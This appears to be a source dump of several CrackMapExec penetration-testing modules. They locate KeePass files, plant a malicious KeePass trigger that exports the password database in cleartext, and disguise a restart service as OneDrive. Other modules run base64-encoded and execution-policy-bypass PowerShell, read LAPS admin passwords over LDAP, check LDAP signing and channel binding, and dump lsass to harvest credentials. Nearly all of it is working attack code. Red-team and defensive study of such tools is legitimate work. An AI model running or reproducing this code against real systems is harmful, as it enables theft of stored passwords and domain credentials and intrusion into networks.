context.log.debug(f"Received general exception while attempting to clean up logins: {e}")
================================================
FILE: cme/modules/keepass_discover.py
================================================
from csv import reader
class CMEModule:
"""
Search for KeePass-related files and process
Module by @d3lb3
Inspired by @harmj0y https://raw.githubusercontent.com/GhostPack/KeeThief/master/PowerShell/KeePassConfig.ps1
"""
name = "keepass_discover"
description = "Search for KeePass-related files and process."
supported_protocols = ["smb"]
opsec_safe = True # only legitimate commands are executed on the remote host (search process and files)
multiple_hosts = True
def __init__(self):
self.search_type = "ALL"
self.search_path = "'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'"
def options(self, context, module_options):
"""
SEARCH_TYPE Specify what to search, between:
PROCESS Look for running KeePass.exe process only
FILES Look for KeePass-related files (KeePass.config.xml, .kdbx, KeePass.exe) only, may take some time
ALL Look for running KeePass.exe process and KeePass-related files (default)
SEARCH_PATH Comma-separated remote locations where to search for KeePass-related files (you must add single quotes around the paths if they include spaces)
Default: 'C:\\Users\\','$env:PROGRAMFILES','env:ProgramFiles(x86)'
"""
if "SEARCH_PATH" in module_options:
self.search_path = module_options["SEARCH_PATH"]
if "SEARCH_TYPE" in module_options:
self.search_type = module_options["SEARCH_TYPE"]
def on_admin_login(self, context, connection):
if self.search_type == "ALL" or self.search_type == "PROCESS":
# search for keepass process
search_keepass_process_command_str = 'powershell.exe "Get-Process kee* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True) # we return the powershell command as a CSV for easier column parsing
csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",")
next(csv_reader) # to skip the csv header line
row_number = 0 # as csv_reader is an iterator we can't get its length without exhausting it
for row in csv_reader:
row_number += 1
keepass_process_id = row[0]
keepass_process_username = row[1]
keepass_process_name = row[2]
context.log.highlight(
'Found process "{}" with PID {} (user {})'.format(
keepass_process_name,
keepass_process_id,
keepass_process_username,
)
)
if row_number == 0:
context.log.display("No KeePass-related process was found")
# search for keepass-related files
if self.search_type == "ALL" or self.search_type == "FILES":
search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format(self.search_path)
search_keepass_files_cmd = 'powershell.exe "{}"'.format(search_keepass_files_payload)
search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n")
found = False
found_xml = False
for file in search_keepass_files_output:
if "KeePass" in file or "kdbx" in file:
if "xml" in file:
found_xml = True
found = True
context.log.highlight("Found {}".format(file))
if not found:
context.log.display("No KeePass-related file were found")
elif not found_xml:
context.log.fail("No config settings file found !!!")
================================================
FILE: cme/modules/keepass_trigger.py
================================================
import os
import sys
import json
from xmltodict import parse
from time import sleep
from csv import reader
from base64 import b64encode
from io import BytesIO, StringIO
from xml.etree import ElementTree
from cme.helpers.powershell import get_ps_script
class CMEModule:
"""
Make use of KeePass' trigger system to export the database in cleartext
References: https://keepass.info/help/v2/triggers.html
https://web.archive.org/web/20211017083926/http://www.harmj0y.net:80/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
Module by @d3lb3, inspired by @harmj0y work
"""
name = "keepass_trigger"
description = "Set up a malicious KeePass trigger to export the database in cleartext."
supported_protocols = ["smb"]
# while the module only executes legit powershell commands on the target (search and edit files)
# some EDR like Trend Micro flag base64-encoded powershell as malicious
# the option PSH_EXEC_METHOD can be used to avoid such execution, and will drop scripts on the target
opsec_safe = False
multiple_hosts = False
def __init__(self):
# module options
self.action = None
self.keepass_config_path = None
self.keepass_user = None
self.export_name = "export.xml"
self.export_path = "C:\\Users\\Public"
self.powershell_exec_method = "PS1"
# additional parameters
self.share = "C$"
self.remote_temp_script_path = "C:\\Windows\\Temp\\temp.ps1"
self.keepass_binary_path = "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe"
self.local_export_path = "/tmp"
self.trigger_name = "export_database"
self.poll_frequency_seconds = 5
self.dummy_service_name = "OneDrive Sync KeePass"
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1"), "r") as remove_trigger_script_file:
self.remove_trigger_script_str = remove_trigger_script_file.read()
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1"), "r") as add_trigger_script_file:
self.add_trigger_script_str = add_trigger_script_file.read()
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1"), "r") as restart_keepass_script_file:
self.restart_keepass_script_str = restart_keepass_script_file.read()
def options(self, context, module_options):
"""
ACTION (mandatory) Performs one of the following actions, specified by the user:
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
specified file
RESTART restart KeePass using a Windows service (used to force trigger reload),
if multiple KeePass process are running, rely on USER option
POLL search for EXPORT_NAME file in EXPORT_PATH folder
(until found, or manually exited by the user)
CLEAN remove malicious trigger from KEEPASS_CONFIG_PATH as well as database
export files from EXPORT_PATH
ALL performs ADD, CHECK, RESTART, POLL, CLEAN actions one after the other
KEEPASS_CONFIG_PATH Path of the remote KeePass configuration file where to add a malicious trigger
(used by ADD, CHECK and CLEAN actions)
USER Targeted user running KeePass, used to restart the appropriate process
(used by RESTART action)
EXPORT_NAME Name fo the database export file, default: export.xml
EXPORT_PATH Path where to export the KeePass database in cleartext
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
PSH_EXEC_METHOD Powershell execution method, may avoid detections depending on the AV/EDR in use
(while no 'malicious' command is executed):
ENCODE run scripts through encoded oneliners
PS1 run scripts through a file dropped in C:\\Windows\\Temp (default)
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
but they can still be easily edited in the module __init__ code if needed
"""
if "ACTION" in module_options:
if module_options["ACTION"] not in [
"ADD",
"CHECK",
"RESTART",
"SINGLE_POLL",
"POLL",
"CLEAN",
"ALL",
]:
context.log.fail("Unrecognized action, use --options to list available parameters")
exit(1)
else:
self.action = module_options["ACTION"]
else:
context.log.fail("Missing ACTION option, use --options to list available parameters")
exit(1)
if "KEEPASS_CONFIG_PATH" in module_options:
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
if "USER" in module_options:
self.keepass_user = module_options["USER"]
if "EXPORT_NAME" in module_options:
self.export_name = module_options["EXPORT_NAME"]
if "EXPORT_PATH" in module_options:
self.export_path = module_options["EXPORT_PATH"]
if "PSH_EXEC_METHOD" in module_options:
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:
context.log.fail("Unrecognized powershell execution method, use --options to list available parameters")
exit(1)
else:
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
def on_admin_login(self, context, connection):
if self.action == "ADD":
self.add_trigger(context, connection)
elif self.action == "CHECK":
self.check_trigger_added(context, connection)
elif self.action == "RESTART":
self.restart(context, connection)
elif self.action == "POLL":
self.poll(context, connection)
elif self.action == "CLEAN":
self.clean(context, connection)
self.restart(context, connection)
elif self.action == "ALL":
self.all_in_one(context, connection)
def add_trigger(self, context, connection):
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
# check if the specified KeePass configuration file exists
if self.trigger_added(context, connection):
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
return
context.log.display(f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'")
# prepare the trigger addition script based on user-specified parameters (e.g: trigger name, etc)
# see data/keepass_trigger_module/AddKeePassTrigger.ps1 for the full script
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportPath", self.export_path)
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportName", self.export_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path)
# add the malicious trigger to the remote KeePass configuration file
if self.powershell_exec_method == "ENCODE":
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode("UTF-16LE")).decode("utf-8")
add_trigger_script_cmd = f"powershell.exe -e {add_trigger_script_b64}"
connection.execute(add_trigger_script_cmd)
sleep(2) # as I noticed some delay may happen with the encoded powershell command execution
elif self.powershell_exec_method == "PS1":
try:
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
except Exception as e:
context.log.fail(f"Error while adding malicious trigger to file: {e}")
sys.exit(1)
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
if self.trigger_added(context, connection):
context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
else:
context.log.fail(f"Unknown error when adding malicious trigger to file")
sys.exit(1)
def check_trigger_added(self, context, connection):
"""check if the trigger is added to the config file XML tree"""
if self.trigger_added(context, connection):
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
else:
context.log.display(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
def restart(self, context, connection):
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
If multiple process belonging to different users are running simultaneously,
relies on the USER option to choose which one to restart"""
# search for keepass processes
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
# we return the powershell command as a CSV for easier column parsing
csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",")
next(csv_reader) # to skip the header line
keepass_process_list = list(csv_reader)
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
keepass_users = []
for process in keepass_process_list:
keepass_users.append(process[1])
if len(keepass_users) == 0:
context.log.fail("No running KeePass process found, aborting restart")
return
elif len(keepass_users) == 1: # if there is only 1 KeePass process running
# if KEEPASS_USER option is specified then we check if the user matches
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split("\\")[1] != self.keepass_user):
context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart")
return
else:
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False # we search through every KeePass process owner for the specified user
for user in keepass_users:
if user == self.keepass_user or user.split("\\")[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:
context.log.fail(f"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart")
return
else:
context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one")
return
context.log.display("Restarting {}'s KeePass process".format(keepass_users[0]))
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
# see data/keepass_trigger_module/RestartKeePass.ps1
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassUser", self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_DummyServiceName", self.dummy_service_name)
# actually performs the restart on the remote target
if self.powershell_exec_method == "ENCODE":
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
restart_keepass_script_cmd = "powershell.exe -e {}".format(restart_keepass_script_b64)
connection.execute(restart_keepass_script_cmd)
elif self.powershell_exec_method == "PS1":
try:
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:
context.log.fail("Error while restarting KeePass: {}".format(e))
return
def poll(self, context, connection):
"""Search for the cleartext database export file in the specified export folder
(until found, or manually exited by the user)"""
found = False
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
# if the specified path is %APPDATA%, we need to check in every user's folder
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
else:
export_full_path = f"'{self.export_path}\\{self.export_name}'"
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
# we poll every X seconds until the export path is found on the remote machine
while not found:
poll_exports_command_output = connection.execute(poll_export_command_str, True)
if self.export_name not in poll_exports_command_output:
print(".", end="", flush=True)
sleep(self.poll_frequency_seconds)
continue
print("")
# once a database is found, downloads it to the attackers machine
context.log.success("Found database export !")
# in case multiple exports found (may happen if several users exported the database to their APPDATA)
for count, export_path in enumerate(poll_exports_command_output.split("\r\n")):
try:
buffer = BytesIO()
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
# if multiple exports found, add a number at the end of local path to prevent override
if count > 0:
local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." + self.export_name.split(".")[1]
else:
local_full_path = self.local_export_path + "/" + self.export_name
# downloads the exported database
with open(local_full_path, "wb") as f:
f.write(buffer.getbuffer())
remove_export_command_str = "powershell.exe Remove-Item {}".format(export_path)
connection.execute(remove_export_command_str, True)
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
found = True
except Exception as e:
context.log.fail("Error while polling export files, exiting : {}".format(e))
def clean(self, context, connection):
"""Checks for database export + malicious trigger on the remote host, removes everything"""
# if the specified path is %APPDATA%, we need to check in every user's folder
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
else:
export_full_path = f"'{self.export_path}\\{self.export_name}'"
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
poll_export_command_output = connection.execute(poll_export_command_str, True)
# deletes every export found on the remote machine
if self.export_name in poll_export_command_output:
# in case multiple exports found (may happen if several users exported the database to their APPDATA)
for export_path in poll_export_command_output.split("\r\n"):
context.log.display(f"Database export found in '{export_path}', removing")
remove_export_command_str = f"powershell.exe Remove-Item {export_path}"
connection.execute(remove_export_command_str, True)
else:
context.log.display(f"No export found in {self.export_path} , everything is cleaned")
# if the malicious trigger was not self-deleted, deletes it
if self.trigger_added(context, connection):
# prepare the trigger deletion script based on user-specified parameters (e.g: trigger name, etc)
# see data/keepass_trigger_module/RemoveKeePassTrigger.ps1
self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path)
self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name)
# actually performs trigger deletion
if self.powershell_exec_method == "ENCODE":
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode("UTF-16LE")).decode("utf-8")
remove_trigger_script_command_str = f"powershell.exe -e {remove_trigger_script_b64}"
connection.execute(remove_trigger_script_command_str, True)
elif self.powershell_exec_method == "PS1":
try:
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
except Exception as e:
context.log.fail(f"Error while deleting trigger, exiting: {e}")
sys.exit(1)
# check if the specified KeePass configuration file does not contain the malicious trigger anymore
if self.trigger_added(context, connection):
context.log.fail(f"Unknown error while removing trigger '{self.trigger_name}', exiting")
else:
context.log.display(f"Found trigger '{self.trigger_name}' in configuration file, removing")
else:
context.log.success(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping")
def all_in_one(self, context, connection):
"""Performs ADD, RESTART, POLL and CLEAN actions one after the other"""
context.log.highlight("")
self.add_trigger(context, connection)
context.log.highlight("")
self.restart(context, connection)
self.poll(context, connection)
context.log.highlight("")
context.log.display("Cleaning everything...")
self.clean(context, connection)
self.restart(context, connection)
context.log.highlight("")
context.log.display("Extracting password...")
self.extract_password(context)
def trigger_added(self, context, connection):
"""check if the trigger is added to the config file XML tree (returns True/False)"""
# check if the specified KeePass configuration file exists
if not self.keepass_config_path:
context.log.fail("No KeePass configuration file specified, exiting")
sys.exit(1)
try:
buffer = BytesIO()
connection.conn.getFile(self.share, self.keepass_config_path.split(":")[1], buffer.write)
except Exception as e:
context.log.fail(f"Error while getting file '{self.keepass_config_path}', exiting: {e}")
sys.exit(1)
try:
keepass_config_xml_root = ElementTree.fromstring(buffer.getvalue())
except Exception as e:
context.log.fail(f"Error while parsing file '{self.keepass_config_path}', exiting: {e}")
sys.exit(1)
# check if the specified KeePass configuration file does not already contain the malicious trigger
for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"):
if trigger.find("Name").text == self.trigger_name:
return True
return False
def put_file_execute_delete(self, context, connection, psh_script_str):
"""Helper to upload script to a temporary folder, run then deletes it"""
script_str_io = StringIO(psh_script_str)
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read)
script_execute_cmd = "powershell.exe -ep Bypass -F {}".format(self.remote_temp_script_path)
connection.execute(script_execute_cmd, True)
remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format(self.remote_temp_script_path)
connection.execute(remove_remote_temp_script_cmd)
def extract_password(self, context):
xml_doc_path = os.path.abspath(self.local_export_path + "/" + self.export_name)
xml_tree = ElementTree.parse(xml_doc_path)
root = xml_tree.getroot()
to_string = ElementTree.tostring(root, encoding="UTF-8", method="xml")
xml_to_dict = parse(to_string)
dump = json.dumps(xml_to_dict)
obj = json.loads(dump)
if len(obj["KeePassFile"]["Root"]["Group"]["Entry"]):
for obj2 in obj["KeePassFile"]["Root"]["Group"]["Entry"]:
for password in obj2["String"]:
if password["Key"] == "Password":
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"]))
else:
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]))
context.log.highlight("")
if len(obj["KeePassFile"]["Root"]["Group"]["Group"]):
for obj2 in obj["KeePassFile"]["Root"]["Group"]["Group"]:
try:
for obj3 in obj2["Entry"]:
for password in obj3["String"]:
if password["Key"] == "Password":
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"]))
else:
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]))
context.log.highlight("")
except KeyError:
pass
================================================
FILE: cme/modules/laps.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from cme.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
class CMEModule:
"""
Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer)
Initial module:
@T3KX: https://github.com/T3KX/Crackmapexec-LAPS
Credit: @mpgn_x64, @n00py1
"""
name = "laps"
description = "Retrieves the LAPS passwords"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = False
def options(self, context, module_options):
"""
COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *
"""
self.computer = None
if "COMPUTER" in module_options:
self.computer = module_options["COMPUTER"]
def on_login(self, context, connection):
context.log.display("Getting LAPS Passwords")
if self.computer is not None:
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))"
else:
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))"
attributes = [
"msLAPS-EncryptedPassword",
"msLAPS-Password",
"ms-MCS-AdmPwd",
"sAMAccountName",
]
results = connection.search(searchFilter, attributes, 0)
results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)]
if len(results) != 0:
laps_computers = []
for computer in results:
msMCSAdmPwd = ""
sAMAccountName = ""
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in computer["attributes"]}
if "mslaps-encryptedpassword" in values:
msMCSAdmPwd = values["mslaps-encryptedpassword"]
d = LAPSv2Extract(
bytes(msMCSAdmPwd),
connection.username if connection.username else "",
connection.password if connection.password else "",
connection.domain,
connection.nthash if connection.nthash else "",
connection.kerberos,
connection.kdcHost,
339)
try:
data = d.run()
except Exception as e:
self.logger.fail(str(e))
return
r = json.loads(data)
laps_computers.append((str(values["samaccountname"]), r["n"], str(r["p"])))
elif "mslaps-password" in values:
r = json.loads(str(values["mslaps-password"]))
laps_computers.append((str(values["samaccountname"]), r["n"], str(r["p"])))
elif "ms-mcs-admpwd" in values:
laps_computers.append((str(values["samaccountname"]), "", str(values["ms-mcs-admpwd"])))
else:
context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password")
laps_computers = sorted(laps_computers, key=lambda x: x[0])
for sAMAccountName, user, password in laps_computers:
context.log.highlight("Computer:{} User:{:<15} Password:{}".format(sAMAccountName, user, password))
else:
context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !")
================================================
FILE: cme/modules/ldap-checker.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import socket
import ssl
import asyncio
from msldap.connection import MSLDAPClientConnection
from msldap.commons.target import MSLDAPTarget
from asyauth.common.constants import asyauthSecret
from asyauth.common.credentials.ntlm import NTLMCredential
from asyauth.common.credentials.kerberos import KerberosCredential
from asysocks.unicomm.common.target import UniTarget, UniProto
class CMEModule:
"""
Checks whether LDAP signing and channelbinding are required.
Module by LuemmelSec (@theluemmel), updated by @zblurx
Original work thankfully taken from @zyn3rgy's Ldap Relay Scan project: https://github.com/zyn3rgy/LdapRelayScan
"""
name = "ldap-checker"
description = "Checks whether LDAP signing and binding are required and / or enforced"
supported_protocols = ["ldap"]
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
"""
No options available.
"""
pass
def on_login(self, context, connection):
# Conduct a bind to LDAPS and determine if channel
# binding is enforced based on the contents of potential
# errors returned. This can be determined unauthenticated,
# because the error indicating channel binding enforcement
# will be returned regardless of a successful LDAPS bind.
async def run_ldaps_noEPA(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
if err is not None:
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
exit()
_, err = await ldapsClientConn.bind()
if "data 80090346" in str(err):
return True # channel binding IS enforced
elif "data 52e" in str(err):
return False # channel binding not enforced
elif err is None:
# LDAPS bind successful
# because channel binding is not enforced
return False
# Conduct a bind to LDAPS with channel binding supported
# but intentionally miscalculated. In the case that and
# LDAPS bind has without channel binding supported has occured,
# you can determine whether the policy is set to "never" or
# if it's set to "when supported" based on the potential
# error recieved from the bind attempt.
async def run_ldaps_withEPA(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
if err is not None:
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
exit()
# forcing a miscalculation of the "Channel Bindings" av pair in Type 3 NTLM message
ldapsClientConn.cb_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
_, err = await ldapsClientConn.bind()
if "data 80090346" in str(err):
return True
elif "data 52e" in str(err):
return False
elif err is not None:
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
elif err is None:
return False
# Domain Controllers do not have a certificate setup for
# LDAPS on port 636 by default. If this has not been setup,
# the TLS handshake will hang and you will not be able to
# interact with LDAPS. The condition for the certificate
# existing as it should is either an error regarding
# the fact that the certificate is self-signed, or
# no error at all. Any other "successful" edge cases
# not yet accounted for.
def DoesLdapsCompleteHandshake(dcIp):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
ssl_sock = ssl.wrap_socket(
s,
cert_reqs=ssl.CERT_OPTIONAL,
suppress_ragged_eofs=False,
do_handshake_on_connect=False,
)
ssl_sock.connect((dcIp, 636))
try:
ssl_sock.do_handshake()
ssl_sock.close()
return True
except Exception as e:
if "CERTIFICATE_VERIFY_FAILED" in str(e):
ssl_sock.close()
return True
if "handshake operation timed out" in str(e):
ssl_sock.close()
return False
else:
context.log.fail("Unexpected error during LDAPS handshake: " + str(e))
ssl_sock.close()
return False
# Conduct and LDAP bind and determine if server signing
# requirements are enforced based on potential errors
# during the bind attempt.
async def run_ldap(target, credential):
ldapsClientConn = MSLDAPClientConnection(target, credential)
_, err = await ldapsClientConn.connect()
if err is None:
_, err = await ldapsClientConn.bind()
if "stronger" in str(err):
return True # because LDAP server signing requirements ARE enforced
elif ("data 52e" or "data 532") in str(err):
context.log.fail("Not connected... exiting")
exit()
elif err is None:
return False
else:
context.log.fail(str(err))
# Run trough all our code blocks to determine LDAP signing and channel binding settings.
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
secret = connection.password if not connection.nthash else connection.nthash
if not connection.kerberos:
credential = NTLMCredential(
secret=secret,
username=connection.username,
domain=connection.domain,
stype=stype,
)
else:
kerberos_target = UniTarget(
connection.hostname + '.' + connection.domain,
88,
UniProto.CLIENT_TCP,
proxies=None,
dns=None,
dc_ip=connection.domain,
domain=connection.domain
)
credential = KerberosCredential(
target=kerberos_target,
secret=secret,
username=connection.username,
domain=connection.domain,
stype=stype,
)
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapIsProtected = asyncio.run(run_ldap(target, credential))
if ldapIsProtected == False:
context.log.highlight("LDAP Signing NOT Enforced!")
elif ldapIsProtected == True:
context.log.fail("LDAP Signing IS Enforced")
else:
context.log.fail("Connection fail, exiting now")
exit()
if DoesLdapsCompleteHandshake(connection.host) == True:
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True:
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False:
context.log.highlight('LDAPS Channel Binding is set to "NEVER"')
elif ldapsChannelBindingAlwaysCheck == True:
context.log.fail('LDAPS Channel Binding is set to "Required"')
else:
context.log.fail("\nSomething went wrong...")
exit()
else:
context.log.fail(connection.domain + " - cannot complete TLS handshake, cert likely not configured")
================================================
FILE: cme/modules/lsassy_dump.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Author:
# Romain Bentz (pixis - @hackanddo)
# Website:
# https://beta.hackndo.com [FR]
# https://en.hackndo.com [EN]
from lsassy.dumper import Dumper
from lsassy.impacketfile import ImpacketFile
from lsassy.parser import Parser
from lsassy.session import Session
from cme.helpers.bloodhound import add_user_bh
class CMEModule:
name = "lsassy"
description = "Dump lsass and parse the result remotely with lsassy"
supported_protocols = ["smb"]
opsec_safe = True # writes temporary files, and it's possible for them to not be deleted
multiple_hosts = True
def __init__(self, context=None, module_options=None):
self.context = context
self.module_options = module_options
self.method = None
def options(self, context, module_options):
"""
METHOD Method to use to dump lsass.exe with lsassy
"""
self.method = "comsvcs"
if "METHOD" in module_options:
self.method = module_options["METHOD"]
def on_admin_login(self, context, connection):
host = connection.host
domain_name = connection.domain
username = connection.username
password = getattr(connection, "password", "")
lmhash = getattr(connection, "lmhash", "")
nthash = getattr(connection, "nthash", "")
session = Session()
session.get_session(
address=host,
target_ip=host,
port=445,
lmhash=lmhash,
nthash=nthash,
username=username,
password=password,
domain=domain_name,
)
if session.smb_session is None:
context.log.fail("Couldn't connect to remote host")
return False
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
if dumper is None:
context.log.fail("Unable to load dump method '{}'".format(self.method))
return False
file = dumper.dump()
if file is None:
context.log.fail("Unable to dump lsass")
return False
parsed = Parser(file).parse()
if parsed is None:
context.log.fail("Unable to parse lsass dump")
return False
credentials, tickets, masterkeys = parsed
file.close()
context.log.debug(f"Closed dumper file")
file_path = file.get_file_path()
context.log.debug(f"File path: {file_path}")
try:
deleted_file = ImpacketFile.delete(session, file_path)
if deleted_file:
context.log.debug(f"Deleted dumper file")
else:
context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}")
except Exception as e:
context.log.fail(f"[OPSEC] Error deleting temporary lsassy dumper file {file_path}: {e}")
if credentials is None:
credentials = []
for cred in credentials:
c = cred.get_object()
context.log.debug(f"Cred: {c}")
credentials = [cred.get_object() for cred in credentials if cred.ticket is None and cred.masterkey is None and not cred.get_username().endswith("$")]
credentials_unique = []
credentials_output = []
context.log.debug(f"Credentials: {credentials}")
for cred in credentials:
context.log.debug(f"Credential: {cred}")
if [
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"],
] not in credentials_unique:
credentials_unique.append(
[
cred["domain"],
cred["username"],
cred["password"],
cred["lmhash"],
cred["nthash"],
]
)
credentials_output.append(cred)
context.log.debug(f"Calling process_credentials")
self.process_credentials(context, connection, credentials_output)
